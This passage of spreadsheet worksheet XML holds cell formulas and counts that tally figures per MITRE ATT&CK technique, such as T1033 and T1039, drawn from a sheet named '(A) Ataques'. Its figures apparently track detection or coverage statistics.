        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$BX12,"")</f>
        <v>1</v>
      </c>
      <c r="X12" s="20">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$BY12,"")</f>
        <v>32</v>
      </c>
      <c r="Y12" s="532">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",IF($U12=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z12" s="288">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!BZ12,"")</f>
        <v>99</v>
      </c>
      <c r="AA12" s="392">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!CB12,"")</f>
        <v>97</v>
      </c>
      <c r="AB12" s="4">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!CD12,"")</f>
        <v>7</v>
      </c>
      <c r="AC12" s="20">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!CE12,"")</f>
        <v>34</v>
      </c>
      <c r="AD12" s="331">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",IF(Z12=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE12" s="322">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$CF12,"")</f>
        <v>162</v>
      </c>
      <c r="AF12" s="322">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$CH12,"")</f>
        <v>129</v>
      </c>
      <c r="AG12" s="4">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$CJ12,"")</f>
        <v>8</v>
      </c>
      <c r="AH12" s="20">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$CK12,"")</f>
        <v>34</v>
      </c>
      <c r="AI12" s="287">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",IF($AE12=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ12" s="292">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$CL12,"")</f>
        <v>0</v>
      </c>
      <c r="AK12" s="322">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$CN12,"")</f>
        <v>0</v>
      </c>
      <c r="AL12" s="4">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$CP12,"")</f>
        <v>0</v>
      </c>
      <c r="AM12" s="20">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$CQ12,"")</f>
        <v>0</v>
      </c>
      <c r="AN12" s="331">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",IF($AJ12=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO12" s="322">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$CR12,"")</f>
        <v>0</v>
      </c>
      <c r="AP12" s="322">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$CT12,"")</f>
        <v>0</v>
      </c>
      <c r="AQ12" s="4">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$CV12,"")</f>
        <v>0</v>
      </c>
      <c r="AR12" s="20">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$CW12,"")</f>
        <v>0</v>
      </c>
      <c r="AS12" s="287">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",IF($AO12=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT12" s="288">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!CX12,"")</f>
        <v>64</v>
      </c>
      <c r="AU12" s="392">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!CZ12,"")</f>
        <v>33</v>
      </c>
      <c r="AV12" s="4">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!DB12,"")</f>
        <v>2</v>
      </c>
      <c r="AW12" s="20">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!DC12,"")</f>
        <v>32</v>
      </c>
      <c r="AX12" s="331">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",IF($AT12=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY12" s="469">
        <f>'(A) Ataques'!LU12+'(A) Ataques'!MA12+'(A) Ataques'!MG12+'(A) Ataques'!MM12+'(A) Ataques'!MS12</f>
        <v>9</v>
      </c>
      <c r="AZ12" s="510">
        <f>'(A) Ataques'!LW12+'(A) Ataques'!MC12+'(A) Ataques'!MI12+'(A) Ataques'!MO12+'(A) Ataques'!MU12</f>
        <v>5</v>
      </c>
      <c r="BA12" s="471">
        <f>'(A) Ataques'!LY12+'(A) Ataques'!ME12+'(A) Ataques'!MK12+'(A) Ataques'!MQ12+'(A) Ataques'!MW12</f>
        <v>2</v>
      </c>
      <c r="BB12" s="471">
        <f>'(A) Ataques'!LQ12</f>
        <v>5</v>
      </c>
      <c r="BC12" s="331">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",IF($AY12=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD12" s="469">
        <f>IF('(A) Ataques'!$AP12&lt;&gt;"NO",'(A) Ataques'!LL12,"")</f>
        <v>62</v>
      </c>
      <c r="BE12" s="510">
        <f>IF('(A) Ataques'!$AP12&lt;&gt;"NO",'(A) Ataques'!LM12,"")</f>
        <v>33</v>
      </c>
      <c r="BF12" s="471">
        <f>IF('(A) Ataques'!$AP12&lt;&gt;"NO",'(A) Ataques'!LN12,"")</f>
        <v>2</v>
      </c>
      <c r="BG12" s="471">
        <f>IF('(A) Ataques'!$AP12&lt;&gt;"NO",'(A) Ataques'!LO12,"")</f>
        <v>3</v>
      </c>
      <c r="BH12" s="471">
        <f>IF('(A) Ataques'!$AP12&lt;&gt;"NO",'(A) Ataques'!LS12,"")</f>
        <v>33</v>
      </c>
      <c r="BI12" s="331">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",IF($BD12=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ12" s="469">
        <f>'(A) Ataques'!OL12+'(A) Ataques'!OR12+'(A) Ataques'!OX12+'(A) Ataques'!PD12+'(A) Ataques'!PJ12</f>
        <v>0</v>
      </c>
      <c r="BK12" s="510">
        <f>'(A) Ataques'!ON12+'(A) Ataques'!OT12+'(A) Ataques'!OZ12+'(A) Ataques'!PF12+'(A) Ataques'!PL12</f>
        <v>0</v>
      </c>
      <c r="BL12" s="471">
        <f>'(A) Ataques'!OP12+'(A) Ataques'!OV12+'(A) Ataques'!PB12+'(A) Ataques'!PH12+'(A) Ataques'!PN12</f>
        <v>0</v>
      </c>
      <c r="BM12" s="495">
        <f>'(A) Ataques'!OH12</f>
        <v>0</v>
      </c>
      <c r="BN12" s="331">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",IF($BJ12=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO12" s="469">
        <f>IF('(A) Ataques'!$AP12&lt;&gt;"NO",'(A) Ataques'!OC12,"")</f>
        <v>0</v>
      </c>
      <c r="BP12" s="510">
        <f>IF('(A) Ataques'!$AP12&lt;&gt;"NO",'(A) Ataques'!OD12,"")</f>
        <v>0</v>
      </c>
      <c r="BQ12" s="471">
        <f>IF('(A) Ataques'!$AP12&lt;&gt;"NO",'(A) Ataques'!OE12,"")</f>
        <v>0</v>
      </c>
      <c r="BR12" s="471">
        <f>IF('(A) Ataques'!$AP12&lt;&gt;"NO",'(A) Ataques'!OF12,"")</f>
        <v>0</v>
      </c>
      <c r="BS12" s="471">
        <f>IF('(A) Ataques'!$AP12&lt;&gt;"NO",'(A) Ataques'!OJ12,"")</f>
        <v>0</v>
      </c>
      <c r="BT12" s="331">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",IF($BO12=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A13" s="79">
        <f t="shared" si="0"/>
        <v>11</v>
      </c>
      <c r="B13" s="4">
        <f>IF('(A) Ataques'!AK13&lt;&gt;"NO",'(A) Ataques'!E13,"")</f>
        <v>10</v>
      </c>
      <c r="C13" s="6" t="str">
        <f>IF('(A) Ataques'!AK13&lt;&gt;"NO",IF('(A) Ataques'!M13="","",'(A) Ataques'!M13),"")</f>
        <v>T1033-System_owner</v>
      </c>
      <c r="D13" s="4" t="str">
        <f>IF('(A) Ataques'!AK13&lt;&gt;"NO",'(A) Ataques'!F13,"")</f>
        <v>T1033</v>
      </c>
      <c r="E13" s="286">
        <f>IF('(A) Ataques'!AK13&lt;&gt;"NO",'(A) Ataques'!AQ13,"")</f>
        <v>13</v>
      </c>
      <c r="F13" s="288">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!BB13,"")</f>
        <v>0</v>
      </c>
      <c r="G13" s="392">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!BD13,"")</f>
        <v>0</v>
      </c>
      <c r="H13" s="4">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!BF13,"")</f>
        <v>0</v>
      </c>
      <c r="I13" s="20">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!BG13,"")</f>
        <v>0</v>
      </c>
      <c r="J13" s="530">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",IF($F13=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K13" s="322">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$BH13,"")</f>
        <v>0</v>
      </c>
      <c r="L13" s="322">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$BJ13,"")</f>
        <v>0</v>
      </c>
      <c r="M13" s="4">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$BL13,"")</f>
        <v>0</v>
      </c>
      <c r="N13" s="20">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$BM13,"")</f>
        <v>0</v>
      </c>
      <c r="O13" s="532">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",IF($K13=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P13" s="292">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$BN13,"")</f>
        <v>0</v>
      </c>
      <c r="Q13" s="322">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$BP13,"")</f>
        <v>0</v>
      </c>
      <c r="R13" s="4">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$BR13,"")</f>
        <v>0</v>
      </c>
      <c r="S13" s="20">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$BS13,"")</f>
        <v>0</v>
      </c>
      <c r="T13" s="530">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",IF($P13=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U13" s="322">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$BT13,"")</f>
        <v>5</v>
      </c>
      <c r="V13" s="322">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$BV13,"")</f>
        <v>2</v>
      </c>
      <c r="W13" s="4">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$BX13,"")</f>
        <v>2</v>
      </c>
      <c r="X13" s="20">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$BY13,"")</f>
        <v>1</v>
      </c>
      <c r="Y13" s="532">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",IF($U13=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z13" s="288">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!BZ13,"")</f>
        <v>25</v>
      </c>
      <c r="AA13" s="392">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!CB13,"")</f>
        <v>17</v>
      </c>
      <c r="AB13" s="4">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!CD13,"")</f>
        <v>17</v>
      </c>
      <c r="AC13" s="20">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!CE13,"")</f>
        <v>2</v>
      </c>
      <c r="AD13" s="331">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",IF(Z13=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE13" s="322">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$CF13,"")</f>
        <v>30</v>
      </c>
      <c r="AF13" s="322">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$CH13,"")</f>
        <v>19</v>
      </c>
      <c r="AG13" s="4">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$CJ13,"")</f>
        <v>19</v>
      </c>
      <c r="AH13" s="20">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$CK13,"")</f>
        <v>2</v>
      </c>
      <c r="AI13" s="287">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",IF($AE13=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ13" s="292">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$CL13,"")</f>
        <v>0</v>
      </c>
      <c r="AK13" s="322">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$CN13,"")</f>
        <v>0</v>
      </c>
      <c r="AL13" s="4">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$CP13,"")</f>
        <v>0</v>
      </c>
      <c r="AM13" s="20">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$CQ13,"")</f>
        <v>0</v>
      </c>
      <c r="AN13" s="331">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",IF($AJ13=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO13" s="322">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$CR13,"")</f>
        <v>0</v>
      </c>
      <c r="AP13" s="322">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$CT13,"")</f>
        <v>0</v>
      </c>
      <c r="AQ13" s="4">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$CV13,"")</f>
        <v>0</v>
      </c>
      <c r="AR13" s="20">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!$CW13,"")</f>
        <v>0</v>
      </c>
      <c r="AS13" s="287">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",IF($AO13=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT13" s="288">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!CX13,"")</f>
        <v>0</v>
      </c>
      <c r="AU13" s="392">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!CZ13,"")</f>
        <v>0</v>
      </c>
      <c r="AV13" s="4">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!DB13,"")</f>
        <v>0</v>
      </c>
      <c r="AW13" s="20">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",'(A) Ataques'!DC13,"")</f>
        <v>0</v>
      </c>
      <c r="AX13" s="331">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",IF($AT13=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AY13" s="469">
        <f>'(A) Ataques'!LU13+'(A) Ataques'!MA13+'(A) Ataques'!MG13+'(A) Ataques'!MM13+'(A) Ataques'!MS13</f>
        <v>0</v>
      </c>
      <c r="AZ13" s="510">
        <f>'(A) Ataques'!LW13+'(A) Ataques'!MC13+'(A) Ataques'!MI13+'(A) Ataques'!MO13+'(A) Ataques'!MU13</f>
        <v>0</v>
      </c>
      <c r="BA13" s="471">
        <f>'(A) Ataques'!LY13+'(A) Ataques'!ME13+'(A) Ataques'!MK13+'(A) Ataques'!MQ13+'(A) Ataques'!MW13</f>
        <v>0</v>
      </c>
      <c r="BB13" s="471">
        <f>'(A) Ataques'!LQ13</f>
        <v>0</v>
      </c>
      <c r="BC13" s="331">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",IF($AY13=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD13" s="469">
        <f>IF('(A) Ataques'!$AP13&lt;&gt;"NO",'(A) Ataques'!LL13,"")</f>
        <v>10</v>
      </c>
      <c r="BE13" s="510">
        <f>IF('(A) Ataques'!$AP13&lt;&gt;"NO",'(A) Ataques'!LM13,"")</f>
        <v>9</v>
      </c>
      <c r="BF13" s="471">
        <f>IF('(A) Ataques'!$AP13&lt;&gt;"NO",'(A) Ataques'!LN13,"")</f>
        <v>0</v>
      </c>
      <c r="BG13" s="471">
        <f>IF('(A) Ataques'!$AP13&lt;&gt;"NO",'(A) Ataques'!LO13,"")</f>
        <v>5</v>
      </c>
      <c r="BH13" s="471">
        <f>IF('(A) Ataques'!$AP13&lt;&gt;"NO",'(A) Ataques'!LS13,"")</f>
        <v>7</v>
      </c>
      <c r="BI13" s="331">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",IF($BD13=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ13" s="469">
        <f>'(A) Ataques'!OL13+'(A) Ataques'!OR13+'(A) Ataques'!OX13+'(A) Ataques'!PD13+'(A) Ataques'!PJ13</f>
        <v>5</v>
      </c>
      <c r="BK13" s="510">
        <f>'(A) Ataques'!ON13+'(A) Ataques'!OT13+'(A) Ataques'!OZ13+'(A) Ataques'!PF13+'(A) Ataques'!PL13</f>
        <v>2</v>
      </c>
      <c r="BL13" s="471">
        <f>'(A) Ataques'!OP13+'(A) Ataques'!OV13+'(A) Ataques'!PB13+'(A) Ataques'!PH13+'(A) Ataques'!PN13</f>
        <v>2</v>
      </c>
      <c r="BM13" s="495">
        <f>'(A) Ataques'!OH13</f>
        <v>1</v>
      </c>
      <c r="BN13" s="331">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",IF($BJ13=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO13" s="469">
        <f>IF('(A) Ataques'!$AP13&lt;&gt;"NO",'(A) Ataques'!OC13,"")</f>
        <v>5</v>
      </c>
      <c r="BP13" s="510">
        <f>IF('(A) Ataques'!$AP13&lt;&gt;"NO",'(A) Ataques'!OD13,"")</f>
        <v>2</v>
      </c>
      <c r="BQ13" s="471">
        <f>IF('(A) Ataques'!$AP13&lt;&gt;"NO",'(A) Ataques'!OE13,"")</f>
        <v>2</v>
      </c>
      <c r="BR13" s="471">
        <f>IF('(A) Ataques'!$AP13&lt;&gt;"NO",'(A) Ataques'!OF13,"")</f>
        <v>1</v>
      </c>
      <c r="BS13" s="471">
        <f>IF('(A) Ataques'!$AP13&lt;&gt;"NO",'(A) Ataques'!OJ13,"")</f>
        <v>1</v>
      </c>
      <c r="BT13" s="331">
        <f>IF('(A) Ataques'!$AK13&lt;&gt;"NO",IF($BO13=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A14" s="79">
        <f t="shared" si="0"/>
        <v>12</v>
      </c>
      <c r="B14" s="4">
        <f>IF('(A) Ataques'!AK14&lt;&gt;"NO",'(A) Ataques'!E14,"")</f>
        <v>11</v>
      </c>
      <c r="C14" s="6" t="str">
        <f>IF('(A) Ataques'!AK14&lt;&gt;"NO",IF('(A) Ataques'!M14="","",'(A) Ataques'!M14),"")</f>
        <v>T1039-Data_from_network_shared_drive</v>
      </c>
      <c r="D14" s="4" t="str">
        <f>IF('(A) Ataques'!AK14&lt;&gt;"NO",'(A) Ataques'!F14,"")</f>
        <v>T1039</v>
      </c>
      <c r="E14" s="286">
        <f>IF('(A) Ataques'!AK14&lt;&gt;"NO",'(A) Ataques'!AQ14,"")</f>
        <v>3</v>
      </c>
      <c r="F14" s="288">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!BB14,"")</f>
        <v>1</v>
      </c>
      <c r="G14" s="392">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!BD14,"")</f>
        <v>1</v>
      </c>
      <c r="H14" s="4">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!BF14,"")</f>
        <v>1</v>
      </c>
      <c r="I14" s="20">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!BG14,"")</f>
        <v>1</v>
      </c>
      <c r="J14" s="530">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",IF($F14=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K14" s="322">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$BH14,"")</f>
        <v>0</v>
      </c>
      <c r="L14" s="322">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$BJ14,"")</f>
        <v>0</v>
      </c>
      <c r="M14" s="4">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$BL14,"")</f>
        <v>0</v>
      </c>
      <c r="N14" s="20">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$BM14,"")</f>
        <v>0</v>
      </c>
      <c r="O14" s="532">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",IF($K14=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P14" s="292">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$BN14,"")</f>
        <v>1</v>
      </c>
      <c r="Q14" s="322">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$BP14,"")</f>
        <v>1</v>
      </c>
      <c r="R14" s="4">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$BR14,"")</f>
        <v>1</v>
      </c>
      <c r="S14" s="20">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$BS14,"")</f>
        <v>1</v>
      </c>
      <c r="T14" s="530">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",IF($P14=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U14" s="322">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$BT14,"")</f>
        <v>2</v>
      </c>
      <c r="V14" s="322">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$BV14,"")</f>
        <v>2</v>
      </c>
      <c r="W14" s="4">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$BX14,"")</f>
        <v>2</v>
      </c>
      <c r="X14" s="20">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$BY14,"")</f>
        <v>1</v>
      </c>
      <c r="Y14" s="532">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",IF($U14=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z14" s="288">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!BZ14,"")</f>
        <v>20</v>
      </c>
      <c r="AA14" s="392">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!CB14,"")</f>
        <v>20</v>
      </c>
      <c r="AB14" s="4">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!CD14,"")</f>
        <v>18</v>
      </c>
      <c r="AC14" s="20">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!CE14,"")</f>
        <v>3</v>
      </c>
      <c r="AD14" s="331">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",IF(Z14=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE14" s="322">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$CF14,"")</f>
        <v>22</v>
      </c>
      <c r="AF14" s="322">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$CH14,"")</f>
        <v>22</v>
      </c>
      <c r="AG14" s="4">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$CJ14,"")</f>
        <v>20</v>
      </c>
      <c r="AH14" s="20">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$CK14,"")</f>
        <v>3</v>
      </c>
      <c r="AI14" s="287">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",IF($AE14=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ14" s="292">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$CL14,"")</f>
        <v>0</v>
      </c>
      <c r="AK14" s="322">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$CN14,"")</f>
        <v>0</v>
      </c>
      <c r="AL14" s="4">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$CP14,"")</f>
        <v>0</v>
      </c>
      <c r="AM14" s="20">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$CQ14,"")</f>
        <v>0</v>
      </c>
      <c r="AN14" s="331">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",IF($AJ14=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO14" s="322">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$CR14,"")</f>
        <v>0</v>
      </c>
      <c r="AP14" s="322">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$CT14,"")</f>
        <v>0</v>
      </c>
      <c r="AQ14" s="4">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$CV14,"")</f>
        <v>0</v>
      </c>
      <c r="AR14" s="20">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!$CW14,"")</f>
        <v>0</v>
      </c>
      <c r="AS14" s="287">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",IF($AO14=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT14" s="288">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!CX14,"")</f>
        <v>1</v>
      </c>
      <c r="AU14" s="392">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!CZ14,"")</f>
        <v>1</v>
      </c>
      <c r="AV14" s="4">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!DB14,"")</f>
        <v>1</v>
      </c>
      <c r="AW14" s="20">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",'(A) Ataques'!DC14,"")</f>
        <v>1</v>
      </c>
      <c r="AX14" s="331">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",IF($AT14=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY14" s="469">
        <f>'(A) Ataques'!LU14+'(A) Ataques'!MA14+'(A) Ataques'!MG14+'(A) Ataques'!MM14+'(A) Ataques'!MS14</f>
        <v>0</v>
      </c>
      <c r="AZ14" s="510">
        <f>'(A) Ataques'!LW14+'(A) Ataques'!MC14+'(A) Ataques'!MI14+'(A) Ataques'!MO14+'(A) Ataques'!MU14</f>
        <v>0</v>
      </c>
      <c r="BA14" s="471">
        <f>'(A) Ataques'!LY14+'(A) Ataques'!ME14+'(A) Ataques'!MK14+'(A) Ataques'!MQ14+'(A) Ataques'!MW14</f>
        <v>0</v>
      </c>
      <c r="BB14" s="471">
        <f>'(A) Ataques'!LQ14</f>
        <v>0</v>
      </c>
      <c r="BC14" s="331">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",IF($AY14=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD14" s="469">
        <f>IF('(A) Ataques'!$AP14&lt;&gt;"NO",'(A) Ataques'!LL14,"")</f>
        <v>5</v>
      </c>
      <c r="BE14" s="510">
        <f>IF('(A) Ataques'!$AP14&lt;&gt;"NO",'(A) Ataques'!LM14,"")</f>
        <v>4</v>
      </c>
      <c r="BF14" s="471">
        <f>IF('(A) Ataques'!$AP14&lt;&gt;"NO",'(A) Ataques'!LN14,"")</f>
        <v>0</v>
      </c>
      <c r="BG14" s="471">
        <f>IF('(A) Ataques'!$AP14&lt;&gt;"NO",'(A) Ataques'!LO14,"")</f>
        <v>4</v>
      </c>
      <c r="BH14" s="471">
        <f>IF('(A) Ataques'!$AP14&lt;&gt;"NO",'(A) Ataques'!LS14,"")</f>
        <v>1</v>
      </c>
      <c r="BI14" s="331">
        <f>IF('(A) Ataques'!$AK14&lt;&gt;"NO",IF($BD14=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ14" s="469">
